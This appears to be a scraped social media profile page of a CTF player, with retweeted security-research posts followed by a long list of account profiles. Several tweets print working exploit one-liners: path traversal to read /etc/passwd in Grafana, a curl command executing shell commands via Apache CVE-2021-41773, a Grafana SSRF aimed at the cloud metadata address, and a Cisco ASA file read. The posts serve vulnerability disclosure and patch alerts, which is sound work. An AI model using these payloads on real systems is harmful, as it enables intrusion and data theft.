And @d90pwn
LC↯BC / MSLC CTF player Frozen Hell Joined July 2012-
Tweets321
-
Followers916
-
Following115
-
Likes25
Grafana's LFI (grafana-clock-panel plugin): GET /public/plugins/grafana-clock-panel/../../../../../../../etc/passwd
DIFFERENT + MIX = SSRF BYPASS
DIFFERENT + MIX = SSRF BYPASS https://t.co/gi9stC7R1o
Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49 curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv Patch urgently.
The presentation from my talk "Weird Proxies/2 and a bit of magic" at @ZeroNights speakerdeck.com/greendog/2-and…
I've just released the source code for 1u.ms at github.com/neex/1u.ms. PRs are welcome :)
Smarty Template Engine Multiple Sandbox Escape PHP Code Injection Vulnerabilities: srcincite.io/blog/2021/02/1…
TetCTF2021: I have a Web⚔️Crypto: Next-Gen Proxy challenge. It's get inspired by great research of @joshmdx was presentation in BlackHat USA 2020. It's about TLS + SSRF = RCE. Also, here is my slide included in the flag of this: shorturl.at/cquJ7 Happy hacking new year.
Analysis of CVE-2020-14882 Weblogic RCE via HTTP CVSS 9.8/10 Hope you enjoy it ;) Thanks an anonymous man for supporting! testbnull.medium.com/weblogic-rce-b…
Check out @Rhynorater's blog post on CVE-2020-13379: Unauthenticated SSRF in Grafana! rhynorater.github.io/CVE-2020-13379… POC: /avatar/tesdt%3Fd=redirect.rhynorater.com%25253f%253b%https://t.co/tpG2O3i9Bj%252f169.254.169.254
Thank you all so much, that’s incredible, I’m just speechless. We will try very hard and do our best at the production stage to make sure everyone gets Flipper on time. These two days were just crazy and I need to get some sleep now. See ya soon. P.S check the new skin out
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ Happy Hacking!
CVE-2020-8163 - Remote code execution of user-provided local names in Rails Versions Affected: rails < 5.0.1 - Fixed Versions: 4.2.11.2 PoC github.com/sh286/CVE-2020…
PHP 0day fixed lab.wallarm.com/php-remote-cod… (fix: git.php.net/?p=php-src.git…)
Freshly patched RCE in PHP-FPM: bugs.php.net/bug.php?id=785… Exploit: github.com/neex/phuip-fpi… Many nginx+PHP configurations vulnerable, watch out!
My raw #Wordpress #RCE js exploit for CVE-2019-8942 & CVE-2019-8943 issues: gist.github.com/allyshka/f159c…. #exploit #infosec
docs.google.com/document/d/1TO… #meepwnctf #meepwn MeePwnTube writeup lol
Tuan Anh Nguyen⚡️... @haxor31337
15K Followers 2K Following 29 y/o Bug Bounty Hunter and Red Teamer at Viettel Cyber Security. Brand Ambassador @Hacker0x01 - Researcher Spotlight @Bugcrowd
shubs @infosec_au
56K Followers 2K Following Co-founder, security researcher. Building an attack surface management platform, @assetnote
Nicolas Grégoire @Agarri_FR
27K Followers 630 Following Web hacker and Burp Suite Pro trainer Refer to https://t.co/D5tRH7U2hg for trainings Follow @MasteringBurp for free tips and tricks
Charles Fol @cfreal_
4K Followers 668 Following previously @ambionics @LexfoSecurite – blogs: https://t.co/cLoNdCGPU7 https://t.co/JVMLjUzTJU https://t.co/t9a5IcOXSU
Omar Abdul-shafy @Omar_Abdulshafy
42 Followers 1K Following They write the rules. I write the PoC. We're not the same. Old/New Acc https://t.co/lsnRCN449m
Hackviser @hackviserr
2K Followers 3K Following Tailored cybersecurity upskilling platform for all levels, catering to beginners and pros | Best way to boost your #cybersecurity skills
Doom @Doom_paskal
4 Followers 235 Following
0x6e676e @GiangnamKow
0 Followers 13 Following
Diamond Tusks @DiamondTusks
129 Followers 2K Following Engineering dropout 2003 | Crypto Native © 2013 | Cyber Security 2023
BeTheOne @Cuncle3
0 Followers 36 Following
Noticias de Seguridad... @IntamePer
91 Followers 834 Following "Si piensas que la tecnología por sí misma puede resolver tus problemas de seguridad, entonces no entiendes los problemas y no entiendes de tecnología" Bruce S.
HackHaka Sec 🇵🇪... @hackhaka
2K Followers 189 Following You wanna fight against us? #OperationPeru #An0NPeru #HKSec
PuLeeT Sec @PuLeetSec
23 Followers 597 Following Security Researcher | Backend Developer | New Account
NGC 3562 @luftgescheften
104 Followers 2K Following BioElectricity AI Venture Developers. BioMatrix Network Interface Research. Data Analyst. https://t.co/dKr2pMxC0y. Bio Technology .Not Advisor. Do Your Own Research.
nameless @JazonTWong
30 Followers 1K Following I identify as a a plant, please be respect and use the appropriate pronouns (plant/planted)
Ephraim Ojo @ephraim_ojo
125 Followers 381 Following E.E Engineering and Cybersecurity Student. Resourceful Tutor in Maths, and Science; both on-site and virtually. You can trust me to deliver quality service.
BRUNO @skksnsbsbsmsmd
9 Followers 2K Following
Anton IV @Bam_3side
13 Followers 147 Following Founder/CEO https://t.co/p0BJU3Ehzf, Security Expert, 31 y.o.
Mo0n Sha𝄞ow @null001__
55 Followers 3K Following
Sh3in @htetnaingshein
45 Followers 1K Following Threat Analyst, Blue Team Enthusiast , BTL1 | eCDFP | CEH
batutahibnu17🍉 @batutahibnu17
444 Followers 1K Following
Ahmed lotfy @Ahmed846737825
68 Followers 1K Following
TheBlankUnknown @ThatBlankDu
11 Followers 579 Following
Nima😑 @moxymun
38 Followers 1K Following i love this world(paradise) for all sciences i wanna try all of them as much as i can
不一样的少年 @youthallen
46 Followers 1K Following
loibarber @loibarberz
16 Followers 617 Following
sere @x168725386
54 Followers 2K Following
Paul Axe @Paul_Axe
1K Followers 150 Following
Alina Lobzina @AlinaLobzina
84 Followers 943 Following
Nguyen Quang Minh @minhnq22
12 Followers 155 Following
rab0t @rab0t3
0 Followers 653 Following
Sipan V'artagnan ⚖�... @Hexen1337
6K Followers 2K Following Co-founder @hexensio & @xyz_remedy || https://t.co/qvK94LY8Fu 🦇🔊 Opinions are my own!
resource_not_found @resource_found
258 Followers 271 Following
Juan Pablo Perata @cxzero
288 Followers 5K Following OSCP | Pentester | Bug Hunter | CTF player | Developer | Community
Go @GoInfo135
33 Followers 292 Following
James Kettle @albinowax
79K Followers 92 Following Director of Research at PortSwigger aka Burp Suite. Find my research, tools & contact details at https://t.co/vP6UbGmvl3
Burp Suite @Burp_Suite
131K Followers 14 Following Burp Suite is the leading software for web security testing.
Nicolas Grégoire @Agarri_FR
27K Followers 630 Following Web hacker and Burp Suite Pro trainer Refer to https://t.co/D5tRH7U2hg for trainings Follow @MasteringBurp for free tips and tricks
hxp @hxpctf
2K Followers 0 Following hxp - CTF Team This account is inactive. Follow hxp at https://t.co/RdKo3BWaKi
ch @chybeta
14K Followers 4K Following open to bug bounty collaboration @HackenProof Security Researcher Just dm https://t.co/VVU1OV5yz6 业余打土狗
Ramazan @r0hack
2K Followers 271 Following Researcher in @deteact hacked by r0hack https://t.co/xUo4swrcWM
Emil Lerner @emil_lerner
3K Followers 346 Following Independent security researcher. CTO & co-founder of https://t.co/F296lUgKA8. Bushwhackers CTF team.
Just Another Security... @IamSecurity
673 Followers 9 Following Senior Information Security Specialist, Photoshop professional, Nuke advanced user, amateur Python programmer
Paul Axe @Paul_Axe
1K Followers 150 Following
Nguyen The Duc @ducnt_
3K Followers 383 Following Just another web warrior ⚔️ Security Researcher ۞ Principal Security Engineer @Verichains ۞ Pwn2Own 2023 ۞@vnsec squad ۞ 💰https://t.co/wuyz6IfAbA ۞ nano 💻
netcat @0xBADCA7
669 Followers 2K Following Cato the Fako of Information Security. CTFing with LC↯BC, MSLC. Managing cyberz by day, pwning stuff by night. SecTalks organizer. Cogito, ergo sum, ergo pwn.
CTFZone @CTFZone
511 Followers 1 Following
adm1nkyj @adm1nkyj1
1K Followers 526 Following @pksecurity_io co-founder / Android BlaBla researcher
Mihail Bol'shov @i_m_BigBear
289 Followers 165 Following Security Researcher, penetration tester at ...
sqlmap @sqlmap
13K Followers 2 Following ERROR 1062 (23000): Duplicate entry 'DA3BCB630536A3D32BC8DB4ADB4DE1A0' for key 'group_key'
Denis Baranov @DSBaranov
610 Followers 91 Following R&D Director: Application Security, Positive Technologies
C3 ~ RET @c3retc3
639 Followers 484 Following Vehicle security. Also: pentester, infosec and financial auditor, digital forensic investigator, application security metsuke and security architect.
Kirill Firsov @k_firsov
3K Followers 284 Following Founder and Chairman of @FearsOff | Protecting the World’s Top Crypto Exchanges & Financial Institutions | Cybersecurity Enthusiast
NULLCON @nullcon
22K Followers 2K Following International #Security Conference, Training & Exhibition Platform - the neXt security thing! ✈️Up next #NullconBerlin2025
VulnersCom @VulnersCom
3K Followers 2 Following Vulnerabilities, exploits, bug bounty and many more in one database.
Kir Ermakov @isox_xx
1K Followers 382 Following Wild mix of circuit racer and information security specialist.
sadkitty @sadkittyonduty
137 Followers 263 Following #unixway #trustmeimanengineer #cybersecurity #поИБ #TheCakeEaters #MSK #TLV #WomanInTech #LabEveryday #CCIEJourney
Boris Ryutin @dukebarman
2K Followers 848 Following Yet Another Security Engineers lead. Blizzard games fan. Tweets are my personal opinions. #fuzzing https://t.co/xPnADlwcMP
stephan @stepah
854 Followers 553 Following
Sergey Belov @sergeybelove
3K Followers 727 Following Information Security Director @Acronis. Follow @secharvesterx for last cybersec news
Alvaro Muñoz 🇺�... @pwntester
13K Followers 514 Following Security Researcher with @XBOW. CTF #int3pids. Opinions here are mine! bluesky: https://t.co/9HRRzpBECt
the_storm @the_st0rm
4K Followers 949 Following Security Engineer @Meta, Ex @Lacework, @Deloitte, @SecForce_LTD. CTFer with LCBC, vulnerability researcher and exploit dev. Opinions are my own
Dmitry Serebryannikov @dsrbr
1K Followers 88 Following Chief Hacking Officer at Positive Technologies
Sergey Vishnyakov @260hz
5K Followers 97 Following 847B A7D5 B465 7BB8 9316 62C1 932C 3D9E 1872 DF40 https://t.co/ZF0sfdl0Xj
F6 @f6_cybersec
5K Followers 578 Following F6 — ведущий разработчик технологий для борьбы с киберпреступностью, предотвращения и расследования киберпреступлений в России и за рубежом.
WPScan - WordPress Se... @_WPScan_
8K Followers 348 Following With our very own WordPress vulnerability database, WPScan is the leading software for WordPress security scanning.
Serhii Khariuk 🇺�... @ximerus
773 Followers 48 Following Information security expert, CEO https://t.co/jAUkjrDehq Co-founder @DC8044_Cr3w
DarkCaT @Dark___CaT
871 Followers 175 Following Andrei. Security specialist , HTB player, OSCP, OSWE
Ahmed Aboul-Ela @aboul3la
6K Followers 632 Following Infosec Geek. Security Researcher, CTFer with @BalalaikaCr3w / LC↯BCTrends for United States
You might like
